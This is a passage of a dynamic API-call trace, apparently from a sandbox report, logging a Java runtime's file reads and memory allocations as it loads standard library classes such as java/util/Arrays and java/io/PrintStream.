(_Block=0x12217ae0) [0095.173] strlen (_Str="sun/reflect/LangReflectAccess.class") returned 0x23 [0095.173] strcpy (in: _Dest=0x208b410, _Source="sun/reflect/LangReflectAccess.class" | out: _Dest="sun/reflect/LangReflectAccess.class") returned="sun/reflect/LangReflectAccess.class" [0095.173] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x319bb34, lpNewFilePointer=0x208ae90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ae90*=52017972) returned 1 [0095.173] ReadFile (in: hFile=0x134, lpBuffer=0x208aee0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ae60, lpOverlapped=0x0 | out: lpBuffer=0x208aee0*, lpNumberOfBytesRead=0x208ae60*=0x1e, lpOverlapped=0x0) returned 1 [0095.181] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x319bb75, lpNewFilePointer=0x208aef0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208aef0*=52018037) returned 1 [0095.181] ReadFile (in: hFile=0x134, lpBuffer=0x2103ac0, nNumberOfBytesToRead=0x94a, lpNumberOfBytesRead=0x208aec0, lpOverlapped=0x0 | out: lpBuffer=0x2103ac0*, lpNumberOfBytesRead=0x208aec0*=0x94a, lpOverlapped=0x0) returned 1 [0095.182] free (_Block=0x121d8180) [0095.183] free (_Block=0x121d9c60) [0095.204] strlen (_Str="sun/reflect/misc/ReflectUtil.class") returned 0x22 [0095.204] malloc (_Size=0x48) returned 0x121d9a30 [0095.204] malloc (_Size=0xa0) returned 0x12217ae0 [0095.204] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341c357, lpNewFilePointer=0x208dd20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dd20*=54641495) returned 1 [0095.204] ReadFile (in: hFile=0x134, lpBuffer=0x12217ae0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dcf0, lpOverlapped=0x0 | out: lpBuffer=0x12217ae0*, lpNumberOfBytesRead=0x208dcf0*=0xa0, lpOverlapped=0x0) returned 1 [0095.204] malloc (_Size=0x23) returned 0x121d8060 [0095.205] free (_Block=0x12217ae0) [0095.205] strlen (_Str="sun/reflect/misc/ReflectUtil.class") returned 0x22 [0095.205] strcpy (in: _Dest=0x208dea0, _Source="sun/reflect/misc/ReflectUtil.class" | out: _Dest="sun/reflect/misc/ReflectUtil.class") returned="sun/reflect/misc/ReflectUtil.class" [0095.205] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x319a88e, lpNewFilePointer=0x208d920, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d920*=52013198) returned 1 [0095.205] ReadFile (in: hFile=0x134, lpBuffer=0x208d970, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d8f0, lpOverlapped=0x0 | out: lpBuffer=0x208d970*, lpNumberOfBytesRead=0x208d8f0*=0x1e, lpOverlapped=0x0) returned 1 [0095.220] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x319a8ce, lpNewFilePointer=0x208d980, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d980*=52013262) returned 1 [0095.220] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x1266, lpNumberOfBytesRead=0x208d950, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208d950*=0x1266, lpOverlapped=0x0) returned 1 [0095.221] free (_Block=0x121d7a30) [0095.222] free (_Block=0x121d9cb0) [0095.238] strlen (_Str="java/util/Arrays.class") returned 0x16 [0095.238] malloc (_Size=0x48) returned 0x121d9d00 [0095.238] malloc (_Size=0xa0) returned 0x12217ae0 [0095.238] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341bdc2, lpNewFilePointer=0x208db60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208db60*=54640066) returned 1 [0095.238] ReadFile (in: hFile=0x134, lpBuffer=0x12217ae0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208db30, lpOverlapped=0x0 | out: lpBuffer=0x12217ae0*, lpNumberOfBytesRead=0x208db30*=0xa0, lpOverlapped=0x0) returned 1 [0095.238] malloc (_Size=0x17) returned 0x1220cac0 [0095.239] free (_Block=0x12217ae0) [0095.240] strlen (_Str="java/util/Arrays.class") returned 0x16 [0095.240] strcpy (in: _Dest=0x208dce0, _Source="java/util/Arrays.class" | out: _Dest="java/util/Arrays.class") returned="java/util/Arrays.class" [0095.240] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3184fde, lpNewFilePointer=0x208d760, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d760*=51924958) returned 1 [0095.240] ReadFile (in: hFile=0x134, lpBuffer=0x208d7b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d730, lpOverlapped=0x0 | out: lpBuffer=0x208d7b0*, lpNumberOfBytesRead=0x208d730*=0x1e, lpOverlapped=0x0) returned 1 [0095.241] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3185012, lpNewFilePointer=0x208d7c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d7c0*=51925010) returned 1 [0095.241] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x74b6, lpNumberOfBytesRead=0x208d790, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208d790*=0x74b6, lpOverlapped=0x0) returned 1 [0095.250] free (_Block=0x121d8060) [0095.251] free (_Block=0x121d9a30) [0095.280] strlen (_Str="java/io/PrintStream.class") returned 0x19 [0095.280] malloc (_Size=0x48) returned 0x121d95d0 [0095.280] malloc (_Size=0xa0) returned 0x12218af0 [0095.280] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341c310, lpNewFilePointer=0x208e690, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e690*=54641424) returned 1 [0095.280] ReadFile (in: hFile=0x134, lpBuffer=0x12218af0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e660, lpOverlapped=0x0 | out: lpBuffer=0x12218af0*, lpNumberOfBytesRead=0x208e660*=0xa0, lpOverlapped=0x0) returned 1 [0095.280] malloc (_Size=0x1a) returned 0x121d8060 [0095.280] free (_Block=0x12218af0) [0095.281] strlen (_Str="java/io/PrintStream.class") returned 0x19 [0095.281] strcpy (in: _Dest=0x208e810, _Source="java/io/PrintStream.class" | out: _Dest="java/io/PrintStream.class") returned="java/io/PrintStream.class" [0095.281] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3198af0, lpNewFilePointer=0x208e290, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e290*=52005616) returned 1 [0095.281] ReadFile (in: hFile=0x134, lpBuffer=0x208e2e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e260, lpOverlapped=0x0 | out: lpBuffer=0x208e2e0*, lpNumberOfBytesRead=0x208e260*=0x1e, lpOverlapped=0x0) returned 1 [0095.311] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3198b27, lpNewFilePointer=0x208e2f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e2f0*=52005671) returned 1 [0095.311] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x1d67, lpNumberOfBytesRead=0x208e2c0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208e2c0*=0x1d67, lpOverlapped=0x0) returned 1 [0095.325] free (_Block=0x1220cac0) [0095.325] free (_Block=0x121d9d00) [0095.342] strlen (_Str="java/io/FilterOutputStream.class") returned 0x20 [0095.342] malloc (_Size=0x48) returned 0x121d9a30 [0095.342] malloc (_Size=0xa0) returned 0x12218af0 [0095.342] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341c2c2, lpNewFilePointer=0x208dc50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dc50*=54641346) returned 1 [0095.342] ReadFile (in: hFile=0x134, lpBuffer=0x12218af0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dc20, lpOverlapped=0x0 | out: lpBuffer=0x12218af0*, lpNumberOfBytesRead=0x208dc20*=0xa0, lpOverlapped=0x0) returned 1 [0095.342] malloc (_Size=0x21) returned 0x121d80c0 [0095.343] free (_Block=0x12218af0) [0095.343] strlen (_Str="java/io/FilterOutputStream.class") returned 0x20 [0095.343] strcpy (in: _Dest=0x208ddd0, _Source="java/io/FilterOutputStream.class" | out: _Dest="java/io/FilterOutputStream.class") returned="java/io/FilterOutputStream.class" [0095.343] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31986e7, lpNewFilePointer=0x208d850, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d850*=52004583) returned 1 [0095.343] ReadFile (in: hFile=0x134, lpBuffer=0x208d8a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d820, lpOverlapped=0x0 | out: lpBuffer=0x208d8a0*, lpNumberOfBytesRead=0x208d820*=0x1e, lpOverlapped=0x0) returned 1 [0095.343] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3198725, lpNewFilePointer=0x208d8b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d8b0*=52004645) returned 1 [0095.343] ReadFile (in: hFile=0x134, lpBuffer=0x2104940, nNumberOfBytesToRead=0x3cb, lpNumberOfBytesRead=0x208d880, lpOverlapped=0x0 | out: lpBuffer=0x2104940*, lpNumberOfBytesRead=0x208d880*=0x3cb, lpOverlapped=0x0) returned 1 [0095.343] free (_Block=0x121d8060) [0095.344] free (_Block=0x121d95d0) [0095.357] malloc (_Size=0x48) returned 0x121d9990 [0095.357] malloc (_Size=0xa0) returned 0x12218af0 [0095.357] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341c272, lpNewFilePointer=0x208e680, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e680*=54641266) returned 1 [0095.357] ReadFile (in: hFile=0x134, lpBuffer=0x12218af0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e650, lpOverlapped=0x0 | out: lpBuffer=0x12218af0*, lpNumberOfBytesRead=0x208e650*=0xa0, lpOverlapped=0x0) returned 1 [0095.357] malloc (_Size=0x23) returned 0x121d7e20 [0095.358] free (_Block=0x12218af0) [0095.358] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3198287, lpNewFilePointer=0x208e280, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e280*=52003463) returned 1 [0095.358] ReadFile (in: hFile=0x134, lpBuffer=0x208e2d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e250, lpOverlapped=0x0 | out: lpBuffer=0x208e2d0*, lpNumberOfBytesRead=0x208e250*=0x1e, lpOverlapped=0x0) returned 1 [0095.358] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31982c7, lpNewFilePointer=0x208e2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e2e0*=52003527) returned 1 [0095.358] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x420, lpNumberOfBytesRead=0x208e2b0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208e2b0*=0x420, lpOverlapped=0x0) returned 1 [0095.361] malloc (_Size=0x48) returned 0x121d93f0 [0095.361] malloc (_Size=0xa0) returned 0x12218af0 [0095.361] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341c14a, lpNewFilePointer=0x208e2f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e2f0*=54640970) returned 1 [0095.361] ReadFile (in: hFile=0x134, lpBuffer=0x12218af0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e2c0, lpOverlapped=0x0 | out: lpBuffer=0x12218af0*, lpNumberOfBytesRead=0x208e2c0*=0xa0, lpOverlapped=0x0) returned 1 [0095.361] malloc (_Size=0x1f) returned 0x121d8180 [0095.362] free (_Block=0x12218af0) [0095.362] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3193f13, lpNewFilePointer=0x208def0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208def0*=51986195) returned 1 [0095.362] ReadFile (in: hFile=0x134, lpBuffer=0x208df40, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208dec0, lpOverlapped=0x0 | out: lpBuffer=0x208df40*, lpNumberOfBytesRead=0x208dec0*=0x1e, lpOverlapped=0x0) returned 1 [0095.363] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3193f4f, lpNewFilePointer=0x208df50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208df50*=51986255) returned 1 [0095.363] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x1ad7, lpNumberOfBytesRead=0x208df20, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208df20*=0x1ad7, lpOverlapped=0x0) returned 1 [0095.375] malloc (_Size=0x48) returned 0x121d9080 [0095.375] malloc (_Size=0xa0) returned 0x12218af0 [0095.375] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341c0fb, lpNewFilePointer=0x208dc70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dc70*=54640891) returned 1 [0095.376] ReadFile (in: hFile=0x134, lpBuffer=0x12218af0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dc40, lpOverlapped=0x0 | out: lpBuffer=0x12218af0*, lpNumberOfBytesRead=0x208dc40*=0xa0, lpOverlapped=0x0) returned 1 [0095.376] malloc (_Size=0x22) returned 0x121d7a30 [0095.376] free (_Block=0x12218af0) [0095.377] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31925de, lpNewFilePointer=0x208d870, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d870*=51979742) returned 1 [0095.377] ReadFile (in: hFile=0x134, lpBuffer=0x208d8c0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d840, lpOverlapped=0x0 | out: lpBuffer=0x208d8c0*, lpNumberOfBytesRead=0x208d840*=0x1e, lpOverlapped=0x0) returned 1 [0095.377] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x319261d, lpNewFilePointer=0x208d8d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d8d0*=51979805) returned 1 [0095.377] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x18f6, lpNumberOfBytesRead=0x208d8a0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208d8a0*=0x18f6, lpOverlapped=0x0) returned 1 [0095.378] malloc (_Size=0x48) returned 0x121d9c60 [0095.378] malloc (_Size=0xa0) returned 0x12218af0 [0095.378] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341c0a9, lpNewFilePointer=0x208d230, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d230*=54640809) returned 1 [0095.378] ReadFile (in: hFile=0x134, lpBuffer=0x12218af0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d200, lpOverlapped=0x0 | out: lpBuffer=0x12218af0*, lpNumberOfBytesRead=0x208d200*=0xa0, lpOverlapped=0x0) returned 1 [0095.378] malloc (_Size=0x25) returned 0x121d7b50 [0095.379] free (_Block=0x12218af0) [0095.379] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3191a03, lpNewFilePointer=0x208ce30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce30*=51976707) returned 1 [0095.379] ReadFile (in: hFile=0x134, lpBuffer=0x208ce80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ce00, lpOverlapped=0x0 | out: lpBuffer=0x208ce80*, lpNumberOfBytesRead=0x208ce00*=0x1e, lpOverlapped=0x0) returned 1 [0095.380] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3191a45, lpNewFilePointer=0x208ce90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce90*=51976773) returned 1 [0095.380] ReadFile (in: hFile=0x134, lpBuffer=0x21044d0, nNumberOfBytesToRead=0xb99, lpNumberOfBytesRead=0x208ce60, lpOverlapped=0x0 | out: lpBuffer=0x21044d0*, lpNumberOfBytesRead=0x208ce60*=0xb99, lpOverlapped=0x0) returned 1 [0095.380] malloc (_Size=0x48) returned 0x121d95d0 [0095.380] malloc (_Size=0xa0) returned 0x12218af0 [0095.380] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341c051, lpNewFilePointer=0x208c7f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c7f0*=54640721) returned 1 [0095.380] ReadFile (in: hFile=0x134, lpBuffer=0x12218af0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c7c0, lpOverlapped=0x0 | out: lpBuffer=0x12218af0*, lpNumberOfBytesRead=0x208c7c0*=0xa0, lpOverlapped=0x0) returned 1 [0095.381] malloc (_Size=0x2b) returned 0x121d9f30 [0095.381] free (_Block=0x12218af0) [0095.381] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3191723, lpNewFilePointer=0x208c3f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c3f0*=51975971) returned 1 [0095.381] ReadFile (in: hFile=0x134, lpBuffer=0x208c440, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c3c0, lpOverlapped=0x0 | out: lpBuffer=0x208c440*, lpNumberOfBytesRead=0x208c3c0*=0x1e, lpOverlapped=0x0) returned 1 [0095.381] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x319176b, lpNewFilePointer=0x208c450, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c450*=51976043) returned 1 [0095.382] ReadFile (in: hFile=0x134, lpBuffer=0x2105230, nNumberOfBytesToRead=0x298, lpNumberOfBytesRead=0x208c420, lpOverlapped=0x0 | out: lpBuffer=0x2105230*, lpNumberOfBytesRead=0x208c420*=0x298, lpOverlapped=0x0) returned 1 [0095.383] malloc (_Size=0x48) returned 0x121d90d0 [0095.383] malloc (_Size=0xa0) returned 0x12218c10 [0095.383] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341bffa, lpNewFilePointer=0x208dc00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dc00*=54640634) returned 1 [0095.384] ReadFile (in: hFile=0x134, lpBuffer=0x12218c10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dbd0, lpOverlapped=0x0 | out: lpBuffer=0x12218c10*, lpNumberOfBytesRead=0x208dbd0*=0xa0, lpOverlapped=0x0) returned 1 [0095.384] malloc (_Size=0x2a) returned 0x121daab0 [0095.384] free (_Block=0x12218c10) [0095.384] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x318f7b6, lpNewFilePointer=0x208d800, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d800*=51967926) returned 1 [0095.384] ReadFile (in: hFile=0x134, lpBuffer=0x208d850, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d7d0, lpOverlapped=0x0 | out: lpBuffer=0x208d850*, lpNumberOfBytesRead=0x208d7d0*=0x1e, lpOverlapped=0x0) returned 1 [0095.385] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x318f7fd, lpNewFilePointer=0x208d860, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d860*=51967997) returned 1 [0095.385] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x1f26, lpNumberOfBytesRead=0x208d830, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208d830*=0x1f26, lpOverlapped=0x0) returned 1 [0095.387] malloc (_Size=0x48) returned 0x121d9120 [0095.387] malloc (_Size=0xa0) returned 0x12218c10 [0095.387] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341bfb1, lpNewFilePointer=0x208d1c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d1c0*=54640561) returned 1 [0095.387] ReadFile (in: hFile=0x134, lpBuffer=0x12218c10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d190, lpOverlapped=0x0 | out: lpBuffer=0x12218c10*, lpNumberOfBytesRead=0x208d190*=0xa0, lpOverlapped=0x0) returned 1 [0095.387] malloc (_Size=0x1c) returned 0x121d7d30 [0095.388] free (_Block=0x12218c10) [0095.388] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x318efea, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=51965930) returned 1 [0095.388] ReadFile (in: hFile=0x134, lpBuffer=0x208ce10, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ce10*, lpNumberOfBytesRead=0x208cd90*=0x1e, lpOverlapped=0x0) returned 1 [0095.389] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x318f023, lpNewFilePointer=0x208ce20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce20*=51965987) returned 1 [0095.389] ReadFile (in: hFile=0x134, lpBuffer=0x2104af0, nNumberOfBytesToRead=0x793, lpNumberOfBytesRead=0x208cdf0, lpOverlapped=0x0 | out: lpBuffer=0x2104af0*, lpNumberOfBytesRead=0x208cdf0*=0x793, lpOverlapped=0x0) returned 1 [0095.392] malloc (_Size=0x48) returned 0x121d94e0 [0095.392] malloc (_Size=0xa0) returned 0x12218e20 [0095.392] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341bf5a, lpNewFilePointer=0x208dbf0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dbf0*=54640474) returned 1 [0095.392] ReadFile (in: hFile=0x134, lpBuffer=0x12218e20, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dbc0, lpOverlapped=0x0 | out: lpBuffer=0x12218e20*, lpNumberOfBytesRead=0x208dbc0*=0xa0, lpOverlapped=0x0) returned 1 [0095.392] malloc (_Size=0x2a) returned 0x121da4b0 [0095.393] free (_Block=0x12218e20) [0095.393] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x318e620, lpNewFilePointer=0x208d7f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d7f0*=51963424) returned 1 [0095.393] ReadFile (in: hFile=0x134, lpBuffer=0x208d840, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d7c0, lpOverlapped=0x0 | out: lpBuffer=0x208d840*, lpNumberOfBytesRead=0x208d7c0*=0x1e, lpOverlapped=0x0) returned 1 [0095.393] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x318e667, lpNewFilePointer=0x208d850, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d850*=51963495) returned 1 [0095.393] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x983, lpNumberOfBytesRead=0x208d820, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208d820*=0x983, lpOverlapped=0x0) returned 1 [0095.395] malloc (_Size=0x48) returned 0x121d92b0 [0095.395] malloc (_Size=0xa0) returned 0x12218e20 [0095.395] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341bf05, lpNewFilePointer=0x208dbf0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dbf0*=54640389) returned 1 [0095.395] ReadFile (in: hFile=0x134, lpBuffer=0x12218e20, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dbc0, lpOverlapped=0x0 | out: lpBuffer=0x12218e20*, lpNumberOfBytesRead=0x208dbc0*=0xa0, lpOverlapped=0x0) returned 1 [0095.395] malloc (_Size=0x28) returned 0x121d8180 [0095.396] free (_Block=0x12218e20) [0095.396] strlen (_Str="sun/nio/cs/StandardCharsets$Cache.class") returned 0x27 [0095.396] strcpy (in: _Dest=0x208dd70, _Source="sun/nio/cs/StandardCharsets$Cache.class" | out: _Dest="sun/nio/cs/StandardCharsets$Cache.class") returned="sun/nio/cs/StandardCharsets$Cache.class" [0095.396] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x318de8c, lpNewFilePointer=0x208d7f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d7f0*=51961484) returned 1 [0095.396] ReadFile (in: hFile=0x134, lpBuffer=0x208d840, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d7c0, lpOverlapped=0x0 | out: lpBuffer=0x208d840*, lpNumberOfBytesRead=0x208d7c0*=0x1e, lpOverlapped=0x0) returned 1 [0095.397] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x318ded1, lpNewFilePointer=0x208d850, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d850*=51961553) returned 1 [0095.397] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x74f, lpNumberOfBytesRead=0x208d820, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208d820*=0x74f, lpOverlapped=0x0) returned 1 [0095.398] free (_Block=0x121da4b0) [0095.398] free (_Block=0x121d94e0) [0095.411] strlen (_Str="java/lang/ThreadLocal.class") returned 0x1b [0095.411] malloc (_Size=0x48) returned 0x121d9ad0 [0095.411] malloc (_Size=0xa0) returned 0x12218e20 [0095.411] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341bebc, lpNewFilePointer=0x208dc70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dc70*=54640316) returned 1 [0095.411] ReadFile (in: hFile=0x134, lpBuffer=0x12218e20, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dc40, lpOverlapped=0x0 | out: lpBuffer=0x12218e20*, lpNumberOfBytesRead=0x208dc40*=0xa0, lpOverlapped=0x0) returned 1 [0095.412] malloc (_Size=0x1c) returned 0x121d7d30 [0095.412] free (_Block=0x12218e20) [0095.412] strlen (_Str="java/lang/ThreadLocal.class") returned 0x1b [0095.412] strcpy (in: _Dest=0x208ddf0, _Source="java/lang/ThreadLocal.class" | out: _Dest="java/lang/ThreadLocal.class") returned="java/lang/ThreadLocal.class" [0095.412] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x318d330, lpNewFilePointer=0x208d870, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d870*=51958576) returned 1 [0095.412] ReadFile (in: hFile=0x134, lpBuffer=0x208d8c0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d840, lpOverlapped=0x0 | out: lpBuffer=0x208d8c0*, lpNumberOfBytesRead=0x208d840*=0x1e, lpOverlapped=0x0) returned 1 [0095.413] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x318d369, lpNewFilePointer=0x208d8d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d8d0*=51958633) returned 1 [0095.413] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0xb23, lpNumberOfBytesRead=0x208d8a0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208d8a0*=0xb23, lpOverlapped=0x0) returned 1 [0095.413] free (_Block=0x121d8180) [0095.413] free (_Block=0x121d92b0) [0095.421] strlen (_Str="java/util/concurrent/atomic/AtomicInteger.class") returned 0x2f [0095.421] malloc (_Size=0x48) returned 0x121d9850 [0095.422] malloc (_Size=0xa0) returned 0x12218e20 [0095.422] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341be5f, lpNewFilePointer=0x208d670, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d670*=54640223) returned 1 [0095.422] ReadFile (in: hFile=0x134, lpBuffer=0x12218e20, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d640, lpOverlapped=0x0 | out: lpBuffer=0x12218e20*, lpNumberOfBytesRead=0x208d640*=0xa0, lpOverlapped=0x0) returned 1 [0095.422] malloc (_Size=0x30) returned 0x121d9f30 [0095.422] free (_Block=0x12218e20) [0095.424] strlen (_Str="java/util/concurrent/atomic/AtomicInteger.class") returned 0x2f [0095.424] strcpy (in: _Dest=0x208d7f0, _Source="java/util/concurrent/atomic/AtomicInteger.class" | out: _Dest="java/util/concurrent/atomic/AtomicInteger.class") returned="java/util/concurrent/atomic/AtomicInteger.class" [0095.425] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x318c919, lpNewFilePointer=0x208d270, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d270*=51955993) returned 1 [0095.425] ReadFile (in: hFile=0x134, lpBuffer=0x208d2c0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d240, lpOverlapped=0x0 | out: lpBuffer=0x208d2c0*, lpNumberOfBytesRead=0x208d240*=0x1e, lpOverlapped=0x0) returned 1 [0095.425] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x318c966, lpNewFilePointer=0x208d2d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2d0*=51956070) returned 1 [0095.425] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x9ca, lpNumberOfBytesRead=0x208d2a0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208d2a0*=0x9ca, lpOverlapped=0x0) returned 1 [0095.425] free (_Block=0x121d7d30) [0095.426] free (_Block=0x121d9ad0) [0095.460] strlen (_Str="sun/nio/cs/IBM437") returned 0x11 [0095.461] malloc (_Size=0x48) returned 0x121d9080 [0095.461] malloc (_Size=0xa0) returned 0x12218e20 [0095.461] SetFilePointerEx (in: hFile=0x134, 